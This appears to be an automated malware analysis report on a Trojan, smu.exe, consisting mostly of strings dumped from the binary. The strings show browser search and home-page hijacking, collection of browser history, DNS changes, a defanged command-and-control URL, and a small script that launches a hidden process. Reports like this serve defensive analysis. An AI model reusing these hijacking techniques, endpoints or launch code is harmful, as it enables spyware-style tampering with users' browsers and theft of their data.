d=MtqTE47KGyjjA8zS3H7pJFOADWaZCWMCDWjQ0ujplOd9MbV/lVmWaND 60ePIdsrOcMBzS3H5a0be7N36qAF8kdvdSvmslRxPCNs1oS8WZUOzaar9Egy5SzOr9rhzlAQdf09Xr401steNr mQH VoxX6Rze/7NvJYTdPZS04 jvBMWqv6Qvf9DNZawo3yh8aLrtJikea7Vr6RYlRBKnKPhzN0jVqDPxXWcZpZKsofN7lBOl e1/lbjhigtcqjvKJ0HXl60Dt/azGf4WyQ4pBcaujTuYHUvmbfXoBUdDBpfst5Cnu/6UfyPOPBhh4PvLgPcCVrzCocS421e/NCDWm6mw3fw1TVhnvONcolvvTJMhYKAbBQ6MCy/YiDfDObVBWQ6lOY3KgH2A7Ok2sevxNYKZBkH1lwef5iVaJzvCTQFDpqXuumXfvxH80JeF3wmqbFDzGhyy5ZVQY/zgXrmxAdSaCYQnjsEpKqNUiWYmuW54ILS5IZNtenyQHPVyolqBCD/5l0Jp/pGw/wdklma XkH/sMYQW/q6APL9AZS6vInj5q402KYmuO7uUVWQkNDrUzVQogiSiHUUbkt9xGmkZ3KbvoMG8r9VxUGu2nQcHLKpLbWdCZoCU6lTrA4SDxYt3XQUh14jtaQ6zaqej14QNUX9tuDXbGFU/4ilR5GOuvw37L WtwDUNySQevrJPNOODaBdBZnaFneyb3tAKPGOiQlcUlcnVIrWNWsGrgZefH875FB4dAsQ5PNnszPtZSAO/AudQs9axn3MjcyAgLnSpYGBy1utPgkEJWFebggy2cY1Sa9k zM04yMJWSpAMTxjmcpfDFzOuHVu dUt73kOcovtbTwO1fRDkEvb7nxvf6F9X4XhtGfA6F9un4Sj tycBIXzlj5AJYVGg9CeDOJiHVYEMD6f0Yxw9PvVvnPv67ClaftH4KT2nccqYvSDAOzz7tO5R OJbSC7H67zZblJzmrY3OfIBxIaolmlJImDSsXKAcuKKCKL0Y0Gf/sSMU6n3cHi5Y9Aw06mw26Anf1ZHGdeySNMAGf2g58F8QzEcR48L
HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Cache-Control: private,no-cache, no-store
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:20:18 GMT
X-Cache: Miss from cloudfront
Via: 1.1 69ae15d1338b64299d3942a44fc1fb96.cloudfront.net (CloudFront)
X-Amz-Cf-Id: y-P4GnL3XgWw958bmBsKHnH4bmjE4R0VQRvOHKvG4EUsEqr--HSwQg==
Map
The Trojan connects to the servers at the following location(s):
Strings from Dumps
smu.exe_3356:
.text
`.rdata
@.data
.rsrc
@.reloc
D$@j.Xf
<:>
t8Ht.HHt#
F2t%f
#t.Ht
2 34 567
j.Yf;
_tcPVj@
.PjRW
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
0123456789-
%b %d %H : %M : %S %Y
%m / %d / %y
%I : %M : %S %p
%d / %m / %y
operator
GetProcessWindowStation
?456789:;
!"#$%&'()* ,-./0123
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
1.2.3
SQLite format 3
REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYATTACHAVINGROUPDATEBEGINNERELEASEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTOUTERIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLY
CREATE TABLE sqlite_master(
sql text
3.7.2
CREATE TEMP TABLE sqlite_temp_master(
208.69.150.250
208.69.150.252
8.8.8.8
SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\
Catcher.ProcessId:
Catcher.Path:
Watcher.Filter:
2.3.12.1634
smu.exe
Chrome
Report.xml
/Url:
Report factory:
Update.xml
URLSet
Report
homeURL
suggestURL
newTabURL
ieSearchURL
chSearchURL
ffSearchURL
opSearchURL
chromeKeyword
[UpdateParser::Implementation::UpdateParser::ParseUrlSetSection]
vup.tmp
Argument.CheckResult:
Argument.IsRunning:
Delivery of report succeeded. TaskId:
Delivery of report failed.
SHDeleteKeyW
RegDeleteKeyExA
RegDeleteKeyExW
CCCzdef1,11111111-1111-1111-1111-111111111111
NtQueryKey
1.3.6.1.4.1.311.2.1.12
urls
ERROR: %s
SELECT * FROM urls
WebData path:
favicon_url
keyword
originating_url
suggest_url
keywords
keyword LIKE '
WHERE key = 'Default Search Provider ID'
key = 'Default Search Provider ID'
DELETE from keywords WHERE id =
search_url
icon_url
startup_urls
chrome_url_overrides
urls_to_restore_on_startup
www-searching.com
template_url_data
image_url_post_params
instant_url
instant_url_post_params
search_terms_replacement_key
new_tab_url
search_url_post_params
suggestions_url
suggestions_url_post_params
chrome_settings_overrides
session.startup_urls
web_url
search_icon.png
X;
%s>
%s="%s"
%s='%s'
version="%s"
encoding="%s"
standalone="%s"
Snapshot.xml
MozillaFirefox
GoogleChrome
AboutTabsUrl
HomePageUrl
DefaultProviderKeyword
UrlsToRestoreOnStartup
StartupHomepageUrl
Chrome propagate flags:
Firefox propagate flags:
ParentKey:
2, 3, 12, 1634
Envelop.xml
UrlSet
Configuration.xml
Opera
StartPageUrl
AboutTabUrl
SearchScopeUrl
SearchScopeIconUrl
SearchScopeSuggestUrl
DefaultProviderSearchUrl
DefaultProviderIconUrl
DefaultProviderSuggestUrl
SearchPluginUrl
SearchPluginSuggestionUrl
TabPageUrl
SearchEngineFaviconUrl
SearchEngineSuggestionUrl
SearchEngineSearchUrl
SearchEngineKeyword
System.xml
Reset-2.1.0.7
ReportUrl
UpdateUrl
ReportDlls
User.xml
Argument.Snapshot:
Argument.GeneralConfig:
Argument.Flags:
Argument.StartPage:
Argument.Autosearch:
Argument.NewTabPageShow:
Argument.SearchScopeId:
Argument.Tabs:
select count(*) from sqlite_master where type = 'table' and name = '
%d-%m-%Y %H:%M, %a
unable to close due to unfinished backup operation
SQL logic error or missing database
large file support is disabled
unknown database: %s
no such vfs: %s
misuse at line %d of [%.10s]
database corruption at line %d of [%.10s]
cannot open file at line %d of [%.10s]
SQLITE_
d-d-d d:d:d
d-d-d
d:d:d
failed memory resize %u to %u bytes
failed to allocate %u bytes of memory
API call with %s database connection pointer
922337203685477580
RowKey
%s-shm
OsError 0x%x (%u)
%s\etilqs_
Recovered %d frames from WAL file %s
2nd reference to page %d
invalid page number %d
Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)
Failed to read ptrmap key=%d
failed to get page %d
%d of %d pages missing from overflow list starting at %d
Page %d:
freelist leaf count too big on page %d
btreeInitPage() returns error code %d
unable to get the page. error code=%d
On tree page %d cell %d:
On page %d at right child:
Multiple uses for byte %d of page %d
Corruption detected in cell %d on page %d
Fragmentation of %d bytes reported as %d on page %d
Page %d is never used
Outstanding page count goes from %d to %d during this analysis
Pointer map page %d is referenced
keyinfo(%d
%s(%d)
foreign key constraint failed
%s-mjX
unable to use function %s in the requested context
bind on a busy prepared statement: [%s]
zeroblob(%d)
constraint failed at %d in [%s]
abort at %d in [%s]: %s
no such savepoint: %s
cannot open savepoint - SQL statements in progress
cannot rollback transaction - SQL statements in progress
cannot %s savepoint - SQL statements in progress
cannot commit transaction - SQL statements in progress
sqlite_temp_master
SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid
sqlite_master
cannot change %s wal mode from within a transaction
statement aborts at %d: [%s] %s
database table is locked: %s
cannot open view: %s
cannot open virtual table: %s
foreign key
no such column: "%s"
cannot open %s column for writing
indexed
cannot open value of type %s
misuse of aliased aggregate %s
%s: %s.%s.%s
%s: %s
%s: %s.%s
not authorized to use function: %s
%r %s BY term out of range - should be between 1 and %d
too many terms in %s BY clause
variable number must be between ?1 and ?%d
Expression tree is too large (maximum depth %d)
too many columns in %s
too many SQL variables
misuse of aggregate: %s()
%s%.*s"%w"
%.*s"%w"%s
sqlite_rename_table
sqlite_rename_parent
sqlite_rename_trigger
%s OR name=%Q
there is already another table or index with this name: %s
table %s may not be altered
sqlite_
UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
view %s may not be altered
sqlite_sequence
UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q
Cannot add a PRIMARY KEY column
UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q
sqlite_stat1
sqlite_altertab_%s
CREATE TABLE %Q.%s(%s)
DELETE FROM %Q.%s WHERE tbl=%Q
invalid name: "%s"
SELECT idx, stat FROM %Q.sqlite_stat1
too many attached databases - max %d
database %s is already in use
unable to open database: %s
cannot detach database %s
no such database: %s
database %s is locked
sqlite_attach
sqlite_detach
%s %T cannot reference objects in database %s
access to %s.%s is prohibited
access to %s.%s.%s is prohibited
object name reserved for internal use: %s
too many columns on %s
there is already an index named %s
default value of column [%s] is not constant
duplicate column name: %s
AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY
table "%s" has more than one primary key
no such collation sequence: %s
UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d
CREATE %s %.*s
CREATE TABLE %Q.sqlite_sequence(name,seq)
view %s is circularly defined
table %s may not be dropped
UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d
use DROP VIEW to delete view %s
use DROP TABLE to delete table %s
DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'
DELETE FROM %s.sqlite_sequence WHERE name=%Q
foreign key on %s should reference only one column of table %T
DELETE FROM %Q.sqlite_stat1 WHERE tbl=%Q
unknown column "%s" in foreign key definition
number of columns in foreign key does not match the number of columns in the referenced table
indexed columns are not unique
table %s may not be indexed
virtual tables may not be indexed
views may not be indexed
index %s already exists
there is already a table named %s
table %s has no column named %s
sqlite_autoindex_%s_%d
INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
CREATE%s INDEX %.*s
no such index: %S
DELETE FROM %Q.%s WHERE name=%Q
index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped
DELETE FROM %Q.sqlite_stat1 WHERE idx=%Q
a JOIN clause is required before %s
unable to identify the object to be reindexed
cannot modify %s because it is a view
table %s may not be modified
sqlite_source_id
sqlite_version
sqlite_compileoption_get
sqlite_compileoption_used
foreign key mismatch
table %S has %d columns but %d values were supplied
table %S has no column named %s
%d values for %d columns
%s.%s may not be NULL
PRIMARY KEY must be unique
sqlite3_extension_init
no entry point [%s] in shared library [%s]
unable to open shared library [%s]
automatic extension loading failed: %s
error during initialization: %s
foreign_keys
foreign_key_list
*** in database %s ***
unsupported encoding: %s
malformed database schema (%s)
%s - %s
SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid
unsupported file format
database schema is locked: %s
RIGHT and FULL OUTER JOINs are not currently supported
unknown or unsupported join type: %T %T%s%T
cannot have both ON and USING clauses in the same join
a NATURAL join may not have an ON or USING clause
cannot join using column %s - column not present in both tables
%s.%s
ORDER BY clause should come after %s not before
%s:%d
SELECTs to the left and right of %s do not have the same number of result columns
LIMIT clause should come after %s not before
sqlite_subquery_%p_
no such index: %s
no such table: %s
sqlite3_get_table() called with two or more incompatible queries
cannot create %s trigger on view: %S
INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')
cannot create INSTEAD OF trigger on table: %S
no such trigger: %S
no such column: %s
-- TRIGGER %s
PRAGMA vacuum_db.synchronous=OFF
SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'
SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'
SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d
vtable constructor did not declare schema: %s
vtable constructor failed: %s
no such module: %s
at most %d tables in a join
table %s: xBestIndex returned an invalid plan
TABLE %s
cannot use index: %s
%s WITH AUTOMATIC INDEX
%s AS %s
%s VIA MULTI-INDEX UNION
%s WITH INDEX %s
%s VIRTUAL TABLE INDEX %d:%s
%s USING PRIMARY KEY
%s ORDER BY
the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers
the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers
SHELL32.dll
SHLWAPI.dll
GetProcessHeap
KERNEL32.dll
USER32.dll
RegOpenKeyExA
RegCloseKey
RegOpenKeyExW
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
WinHttpReceiveResponse
WinHttpSendRequest
WinHttpConnect
WinHttpCloseHandle
WinHttpQueryDataAvailable
WinHttpOpen
WinHttpOpenRequest
WinHttpReadData
WinHttpGetIEProxyConfigForCurrentUser
WINHTTP.dll
GetExtendedTcpTable
IPHLPAPI.DLL
WS2_32.dll
PSAPI.DLL
WTSAPI32.dll
Secur32.dll
CryptMsgClose
CertGetNameStringW
CertFreeCertificateContext
CertFindCertificateInStore
CertCloseStore
CryptMsgGetParam
CRYPT32.dll
USERENV.dll
HttpSendRequestExW
HttpSendRequestW
HttpAddRequestHeadersW
HttpQueryInfoW
HttpOpenRequestW
HttpEndRequestW
WININET.dll
CreatePipe
ConnectNamedPipe
CreateNamedPipeW
DisconnectNamedPipe
GetNamedPipeInfo
GetCPInfo
RegCreateKeyW
RegCreateKeyExW
RegOpenKeyW
RegQueryInfoKeyW
RegDeleteKeyA
RegDeleteKeyW
RegEnumKeyExA
RegCreateKeyA
RegCreateKeyExA
RegQueryInfoKeyA
RegOpenKeyA
RegEnumKeyExW
RegEnumKeyW
.?AVImplementation@ReportBuilder@Monitor@SpeedBit@@
.?AVReportBuilder@Monitor@SpeedBit@@
.?AVHistoryReportFactory@Implementation@ServerReporter@Monitor@SpeedBit@@
.?AVImplementation@ServerReporter@Monitor@SpeedBit@@
.?AVServerReporter@Monitor@SpeedBit@@
.?AVReportFactory@Implementation@ServerReporter@Monitor@SpeedBit@@
.?AVSendReportTask@Implementation@WatchmanMonitor@Monitor@SpeedBit@@
.?AVEventHandler@SendReportTask@Implementation@WatchmanMonitor@Monitor@SpeedBit@@
.?AVCHttpAsync@@
.?AVPipedProcess@Utils@SpeedBit@@
.?AVImplementation@PipedProcess@Utils@SpeedBit@@
.?AVImplementation@MachineKey@Utils@SpeedBit@@
.?AVMachineKey@Utils@SpeedBit@@
.?AVCHttp@@
.?AVChromeBrowserHistory@SQLite@SpeedBit@@
.?AVException@sql@@
.?AVLoader@Extension@Chrome@SpeedBit@@
.?AVImplementation@Extension@Chrome@SpeedBit@@
.?AVBrowserInfo@Chrome@SpeedBit@@
.?AVFactory@BrowserInfo@Chrome@SpeedBit@@
.?AVImplementation@BrowserInfo@Chrome@SpeedBit@@
.?AVImplementation@Factory@BrowserInfo@Chrome@SpeedBit@@
.?AVExtension@Chrome@SpeedBit@@
.?AVWebDataDB@SQLite@SpeedBit@@
.?AVImplementation@WebDataDB@SQLite@SpeedBit@@
.?AVFirefoxSettings@Implementation@Snapshot@Injection@SpeedBit@@
.?AVSettings@Chrome@Snapshot@Injection@SpeedBit@@
.?AVChromeSettings@Implementation@Snapshot@Injection@SpeedBit@@
.?AVSettings@Firefox@Snapshot@Injection@SpeedBit@@
.?AVSettings@Chrome@General@Config@SpeedBit@@
.?AVUrlSet@Implementation@General@Config@SpeedBit@@
.?AVFirefoxValueSet@Implementation@General@Config@SpeedBit@@
.?AVOperaSettings@Implementation@General@Config@SpeedBit@@
.?AVSettings@Firefox@General@Config@SpeedBit@@
.?AVSettings@Opera@General@Config@SpeedBit@@
.?AVFirefoxSettings@Implementation@General@Config@SpeedBit@@
.?AVChromeSettings@Implementation@General@Config@SpeedBit@@
.?AVChromeValueSet@Implementation@General@Config@SpeedBit@@
.?AVValueSet@Chrome@General@Config@SpeedBit@@
.?AVUrlSet@General@Config@SpeedBit@@
.?AVValueSet@Firefox@General@Config@SpeedBit@@
.?AVChromeSettings@Implementation@User@Config@SpeedBit@@
.?AVSettings@Firefox@User@Config@SpeedBit@@
.?AVFirefoxSettings@Implementation@User@Config@SpeedBit@@
.?AVSettings@Chrome@User@Config@SpeedBit@@
.?AVProfile@Implementation@InstallInfo@Firefox@SpeedBit@@
.?AVInstallInfo@Firefox@SpeedBit@@
.?AVProfile@InstallInfo@Firefox@SpeedBit@@
.?AVInstallInfo@Implementation@0Firefox@SpeedBit@@
.?AVBrowserSettings@Implementation@0Firefox@SpeedBit@@
.?AVBrowserSettings@Firefox@SpeedBit@@
.?AVBrowserSettings@Implementation@0Chrome@SpeedBit@@
.?AVBrowserSettings@Chrome@SpeedBit@@
if (WScript.Arguments.length > 0)
var root = WScript.Arguments(0);
for (var i = 1, n = WScript.Arguments.length; i
args.push(WScript.Arguments(i));
var path = "\"" root.replace(/\\*$/, "").replace(/\//g, "\\") "\"";
path = " \"" args.join("\" \"") "\"";
var shell = WScript.CreateObject("WScript.Shell");
shell.Run(path, 0, false);
combase.dll
kernel32.dll
mscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
portuguese-brazilian
USER32.DLL
Injection::Snapshot::Controller::IsChromeInstalled
Chrome installed:
Injection::Snapshot::Controller::IsFirefoxInstalled
Firefox installed:
Chrome unchanged:
Firefox unchanged:
Checking
Checking
logs\${ModuleName}.${Pid}.log
WatchmanKey::TimeBomb::UninstallTimeBomb
Reporting
ChromeExtensionMonitorWorkerThread started
ChromeExtensionMonitor::CollectExtensionInfo
ChromeExtensionMonitor::CheckExtension
8Reset DNS to 8.8.8.8 for adapter
WinHTTP Example/1.0
VVV.google.com
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows
Registry::Helper::RegOpenKeyExA
Chrome::StartPageProtectionEnabled
Chrome::SearchEngineProtectionEnabled
Chrome::RestoreOnStartupProtectionEnabled
Chrome::StartPageProtectionDisabled
Chrome::SearchEngineProtectionDisabled
Chrome::RestoreOnStartupProtectionDisabled
Firefox::StartPageChangedByUser
Firefox::SearchEngineChangedByUser
Explorer.HomePageEvent:
Explorer.SearchEngineEvent:
Firefox.HomePageEvent:
Firefox.SearchEngineEvent:
ProcessCatcher::ExecutionContext::Resume
Allocation
iexplore.exe
rundll32.exe
chrome.exe
firefox.exe
opera.exe
safari.exe
navigator.exe
torch.exe
U.exe
epic.exe
browser.exe
Maxthon.exe
sbframe.exe
avant.exe
dragon.exe
bobrowser.exe
crossbrowse.exe
vosteran.exe
ProcessMonitor::ExecutionContext::Resume
E:\iexplore.exe|E:\rundll32.exe
E:\chrome.exe
E:\firefox.exe
E:\opera.exe
E:\Safari.exe|E:\crossbrowse.exe|E:\torch.exe|E:\U.exe|E:\epic.exe|E:\vosteran.exe|E:\browser.exe|E:\avant.exe|E:\bobrowser.exe
smci32.dll
smi32.exe
Utils::PipedProcess::Create
Utils::PipedProcess::Start
Utils::PipedProcess::WriteData
[ReportDllsThread]
ProcessWatcher::ExecutionContext::Resume
Local proxy port:
127.0.0.1
[ProxyMonitor::getProcessByPort]
Failed to get GetExtendedTcpTable
smei32.dll
[ReportBuilder::MakeDefaultBrowserSettingsElement]
[ReportBuilder::CalculateHash]
Result.Hash:
[ReportBuilder::MakeHistoryReport]
Building history report...
ReportBuilder::GetWMISystemInfo
ReportBuilder::GetExplorerBrowserInfo
ReportBuilder::GetChromeBrowserInfo
. Chrome Search:
History Report:
[ReportBuilder::MakeReport]
Report:
[ReportBuilder::GetExplorerBrowserInfo]
[ReportBuilder::GetChromeBrowserInfo]
Chrome::BrowserInfo::Factory::Create
Chrome::BrowserInfo::Factory::GetInfo
sma.exe
Utils::PipedProcess::ReadData
Utils::PipedProcess::Wait
Utils::PipedProcess::WriteEof
Utils::MachineKey::Create
Utils::MachineKey::Generate
Encrypt data. Key:
Decrypt data. Key:
ReportBuilder::MakeInstallReport
[ServerReporter::SendInstallReport]
ReportBuilder::MakeUninstallReport
[ServerReporter::SendUninstallReport]
ReportBuilder::MakeRegulatReport
[ServerReporter::SendRegularReport]
ReportBuilder::MakeUserActionReport
[ServerReporter::SendUserActionReport]
ReportBuilder::MakeHistoryReport
[ServerReporter::SendHistoryReport]
ServerReporter::MakeReport
ServerReporter::SendReport
[ServerReporter::SendReport]
ServerEncryption::CreateSessionKey
Report in Base 64:
10D2FBE6-2346-4627-A9F5-FB48313C5001
ServerReporter::Implementation::GetTargetUrl - User GUID is problematic GUID (hardcoded/unknown)
ServerReporter::Implementation::GetTargetUrl - Failed replacing problematic GUID with new one
[ServerReporter::GetUserProfile]
[ServerReporter::MakeReport]
ServerReporter::GetUserProfile
ReportBuilder::Create
Result.Report:
[ServerReporter::SetLastReportTime]
WatchmanKey::Reporter::SetLastTime
Package url:
WatchmanKey::Updater::SetLastTime
.Service
\Microsoft\Windows\Start Menu
*.lnk
\Internet Explorer\iexplore.exe
\Safari\Safari.exe
/report
/report1
%d.%d.%d.%d%n
Created URL Set object from configuration. Name:
UrlSetID:
Could not find matching URL set... Using old configuration
[LocalScope::UpdateParser::ParseReportSection]
[LocalScope::UpdateParser::ParseReportSection]
Monitor::ServerEncryption::CreateSessionKey
Monitor::ServerEncryption::CreateSessionKey
Full url:
Full url:
Data url:
Data url:
sbu.exe
sbu.exe
smw.sys
smw.sys
wscript.exe
wscript.exe
smhe.js
smhe.js
[Monitor::WatchmanGuard::SendReport]
[Monitor::WatchmanGuard::SendReport]
InstallReporter
InstallReporter
Monitor::ServerReporter::Create
Monitor::ServerReporter::Create
Monitor::ServerReporter::SendInitialReport
Monitor::ServerReporter::SendInitialReport
/urlset:
/urlset:
Options.InjectAllBrowsers:
Options.InjectAllBrowsers:
Options.InjectDefaultOnly:
Options.InjectDefaultOnly:
Options.ServiceName:
Options.ServiceName:
Options.ProductCode:
Options.ProductCode:
Options.ProductPriority:
Options.ProductPriority:
Options.EnablePinner:
Options.EnablePinner:
Options.EnableRedirect:
Options.EnableRedirect:
Options.EnableYellowBandSuppression:
Options.EnableYellowBandSuppression:
Options.UpdateUrl:
Options.UpdateUrl:
Options.ReportUrl:
Options.ReportUrl:
Options.AutoStart:
Options.AutoStart:
Options.ProtectSearch:
Options.ProtectSearch:
Options.ProtectHome:
Options.ProtectHome:
Options.ProtectTab:
Options.ProtectTab:
Options.ExplorerInjection:
Options.ExplorerInjection:
Options.ChromeInjection:
Options.ChromeInjection:
Options.FirefoxInjection:
Options.FirefoxInjection:
Options.OperaInjection:
Options.OperaInjection:
Options.ConfigPath:
Options.ConfigPath:
Options.ConfigKey:
Options.ConfigKey:
Getting current URL Set
Getting current URL Set
Getting URL Set from options
Getting URL Set from options
] Provided. And is different from current URL set [
] Provided. And is different from current URL set [
URL Set [
URL Set [
general_config.xml
general_config.xml
system_config.xml
system_config.xml
[WatchmanInstaller::SendReport1]
[WatchmanInstaller::SendReport1]
iexplore.exe is running, result for getting DLL's:
iexplore.exe is running, result for getting DLL's:
firefox.exe is running, result for getting DLL's:
firefox.exe is running, result for getting DLL's:
chrome.exe is running, result for getting DLL's:
chrome.exe is running, result for getting DLL's:
ServerReporter::Create
ServerReporter::Create
URL to use:
URL to use:
ServerReporter::SendRegularReport
ServerReporter::SendRegularReport
[WatchmanInstaller::SendReport]
[WatchmanInstaller::SendReport]
Currently set URLSet:
Currently set URLSet:
Updating system config with new URL set...
Updating system config with new URL set...
Already reported duiring first install
Already reported duiring first install
Report' been sent:
Report' been sent:
WatchmanInstaller::SendReport1
WatchmanInstaller::SendReport1
calling SendReport1...
calling SendReport1...
WatchmanInstaller::SendReport
WatchmanInstaller::SendReport
[Monitor::WatchmanMonitor::CreateSendReportTask]
[Monitor::WatchmanMonitor::CreateSendReportTask]
SendReportTask
SendReportTask
new
new
[Monitor::WatchmanMonitor::OnSendReportSucceeded]
[Monitor::WatchmanMonitor::OnSendReportSucceeded]
[Monitor::WatchmanMonitor::OnSendReportFailed]
[Monitor::WatchmanMonitor::OnSendReportFailed]
Need to send report!!!
Need to send report!!!
Original report URL:
Original report URL:
ServerReporter::SendInitialReport
ServerReporter::SendInitialReport
[Monitor::WatchmanMonitor::OnChromeProtectionChanged]
[Monitor::WatchmanMonitor::OnChromeProtectionChanged]
User has changed the chrome protection for:
User has changed the chrome protection for:
[Monitor::WatchmanMonitor::OnResetFirefoxProtection]
[Monitor::WatchmanMonitor::OnResetFirefoxProtection]
User has reset the firefox protection:
User has reset the firefox protection:
Next report task:
Next report task:
Scheduller::RegisterTask
Scheduller::RegisterTask
Monitor::Application::EnsureSystemKey
Monitor::Application::EnsureSystemKey
Options.Revert:
Options.Revert:
Settings.Final:
Settings.Final:
ADVAPI32.DLL
ADVAPI32.DLL
shlwapi.dll
shlwapi.dll
Utils::Registry::OpenKeyExW
Utils::Registry::OpenKeyExW
Subkey:
Subkey:
[Utils::Registry::RecursiveDeleteKeyW]
[Utils::Registry::RecursiveDeleteKeyW]
SHLWAPI.GetAddressOf
SHLWAPI.GetAddressOf
WKERNEL32.DLL
WKERNEL32.DLL
VERSION.DLL
VERSION.DLL
hXXp://d1y2jryd6u59ns.cloudfront.net/p.ashx
hXXp://d1y2jryd6u59ns.cloudfront.net/p.ashx
\\.\pipe\
\\.\pipe\
Could not create thread event. %%s
Could not create thread event. %%s
Could not create new client event. %%s
Could not create new client event. %%s
Could not create accept thread. %%s
Could not create accept thread. %%s
Could not create work thread. %%s
Could not create work thread. %%s
Could not start thread. %%s
Could not start thread. %%s
Stop IPC error. %%s
Stop IPC error. %%s
Pipe (0x%X) read problems. %%s
Pipe (0x%X) read problems. %%s
NTDLL.DLL
NTDLL.DLL
Windows NT 6.1
Windows NT 6.1
%s?e=%s
%s?e=%s
zvl=%s&
zvl=%s&
%s?prd=%s&aff=%s&ver=%s&rnd=%d&usid=%s&pixGuid=%s
%s?prd=%s&aff=%s&ver=%s&rnd=%d&usid=%s&pixGuid=%s
&tss=%d&action=%s&actionparam=%s
&tss=%d&action=%s&actionparam=%s
[Utils::PipedProcess::CreateOutputHandles]
[Utils::PipedProcess::CreateOutputHandles]
[Utils::PipedProcess::CreateInputHandles]
[Utils::PipedProcess::CreateInputHandles]
[Utils::PipedProcess::SpawnProcess]
[Utils::PipedProcess::SpawnProcess]
Utils::PipedProcess::CreateOutputHandles
Utils::PipedProcess::CreateOutputHandles
Utils::PipedProcess::CreateInputHandles
Utils::PipedProcess::CreateInputHandles
Utils::PipedProcess::SpawnProcess
Utils::PipedProcess::SpawnProcess
[Utils::PipedProcess::Start]
[Utils::PipedProcess::Start]
[Utils::PipedProcess::Wait]
[Utils::PipedProcess::Wait]
Utils::PipedProcess::WriteProc
Utils::PipedProcess::WriteProc
[Utils::PipedProcess::WriteData]
[Utils::PipedProcess::WriteData]
Utils::PipedProcess::ReadProc
Utils::PipedProcess::ReadProc
[Utils::PipedProcess::ReadData]
[Utils::PipedProcess::ReadData]
.cache
.cache
ntdll.dll
ntdll.dll
Could not open memory object. Object name: %s. %%s
Could not open memory object. Object name: %s. %%s
Could not create memory object. Object name: %s. %%s
Could not create memory object. Object name: %s. %%s
Could not map memory object. Object name: %s. Size: %u. %%s
Could not map memory object. Object name: %s. Size: %u. %%s
Could not map memory object. Object name: %s. %%s
Could not map memory object. Object name: %s. %%s
Could not create sync object for memory. Object name: %s. %%s
Could not create sync object for memory. Object name: %s. %%s
pathToSignedProductExe
pathToSignedProductExe
SELECT * FROM Win32_OperatingSystem
SELECT * FROM Win32_OperatingSystem
[BrowserHistory::GetPropertyReport]
[BrowserHistory::GetPropertyReport]
Found URL:
Found URL:
X-hX-hX-XX-XXXXXX
X-hX-hX-XX-XXXXXX
IExecAction::put_Path
IExecAction::put_Path
IAction::QueryInterface
IAction::QueryInterface
IExecAction::put_Arguments
IExecAction::put_Arguments
IExecAction::put_WorkingDirectory
IExecAction::put_WorkingDirectory
